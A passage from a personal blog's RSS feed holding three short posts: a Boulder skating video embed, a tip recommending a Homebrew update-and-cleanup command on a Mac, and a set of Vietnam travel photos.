		<title>Skating in Boulder</title>
		<link>https://64mm.com/skating-in-boulder/</link>
		
		
		<pubDate>Mon, 17 Feb 2025 20:53:05 +0000</pubDate>
				<category><![CDATA[Skate]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[boulder]]></category>
		<category><![CDATA[colorado]]></category>
		<category><![CDATA[fun]]></category>
		<category><![CDATA[skate]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1128</guid>

					<description><![CDATA[Some springtime fun in Boulder, Co a few years back.]]></description>
										<content:encoded><![CDATA[
<p>Some springtime fun in Boulder, Co a few years back.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Boulder" width="640" height="360" src="https://www.youtube.com/embed/EsBwPx3Atm4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>



<p></p>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>handy Mac cmd</title>
		<link>https://64mm.com/handy-mac-cmd/</link>
		
		
		<pubDate>Mon, 17 Feb 2025 20:14:37 +0000</pubDate>
				<category><![CDATA[Words]]></category>
		<category><![CDATA[brew]]></category>
		<category><![CDATA[mac]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1124</guid>

					<description><![CDATA[I use a mac for video and photos. I&#8217;ve never done much else on one, but I found Homebrew — The Missing Package Manager for macOS (or Linux) which is great for someone like me who does most of their other work on a &#8216;nix machine and loves using the command line (read as &#8216;old [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>I use a mac for video and photos. I&#8217;ve never done much else on one, but I found <a href="https://brew.sh/">Homebrew — The Missing Package Manager for macOS (or Linux)</a> which is great for someone like me who does most of their other work on a &#8216;nix machine and loves using the command line (read as &#8216;old dude&#8217;). This command specially. Afforded me more disk space. &#8216;$ brew update &amp;&amp; brew upgrade &amp;&amp; brew cleanup&#8217;</p>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
		<item>
		<title>Vietnam</title>
		<link>https://64mm.com/viet-nam/</link>
		
		
		<pubDate>Sun, 16 Feb 2025 19:19:57 +0000</pubDate>
				<category><![CDATA[Travel]]></category>
		<category><![CDATA[vietnam]]></category>
		<guid isPermaLink="false">https://64mm.com/?p=1121</guid>

					<description></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://64mm.com/wp-content/uploads/2025/02/IMG_5603-1024x768.png" alt="" class="wp-image-1118" srcset="https://64mm.com/wp-content/uploads/2025/02/IMG_5603-1024x768.png 1024w, https://64mm.com/wp-content/uploads/2025/02/IMG_5603-300x225.png 300w, https://64mm.com/wp-content/uploads/2025/02/IMG_5603-768x576.png 768w, https://64mm.com/wp-content/uploads/2025/02/IMG_5603-1536x1152.png 1536w, https://64mm.com/wp-content/uploads/2025/02/IMG_5603-2048x1536.png 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://64mm.com/wp-content/uploads/2025/02/IMG_5647-1024x768.png" alt="" class="wp-image-1119" srcset="https://64mm.com/wp-content/uploads/2025/02/IMG_5647-1024x768.png 1024w, https://64mm.com/wp-content/uploads/2025/02/IMG_5647-300x225.png 300w, https://64mm.com/wp-content/uploads/2025/02/IMG_5647-768x576.png 768w, https://64mm.com/wp-content/uploads/2025/02/IMG_5647-1536x1152.png 1536w, https://64mm.com/wp-content/uploads/2025/02/IMG_5647-2048x1536.png 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://64mm.com/wp-content/uploads/2025/02/IMG_5700-1024x768.png" alt="" class="wp-image-1120" srcset="https://64mm.com/wp-content/uploads/2025/02/IMG_5700-1024x768.png 1024w, https://64mm.com/wp-content/uploads/2025/02/IMG_5700-300x225.png 300w, https://64mm.com/wp-content/uploads/2025/02/IMG_5700-768x576.png 768w, https://64mm.com/wp-content/uploads/2025/02/IMG_5700-1536x1152.png 1536w, https://64mm.com/wp-content/uploads/2025/02/IMG_5700-2048x1536.png 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
]]></content:encoded>
					
		
		
			<dc:creator>csw64mm@gmail.com (64MM)</dc:creator></item>
	</channel>
</rss>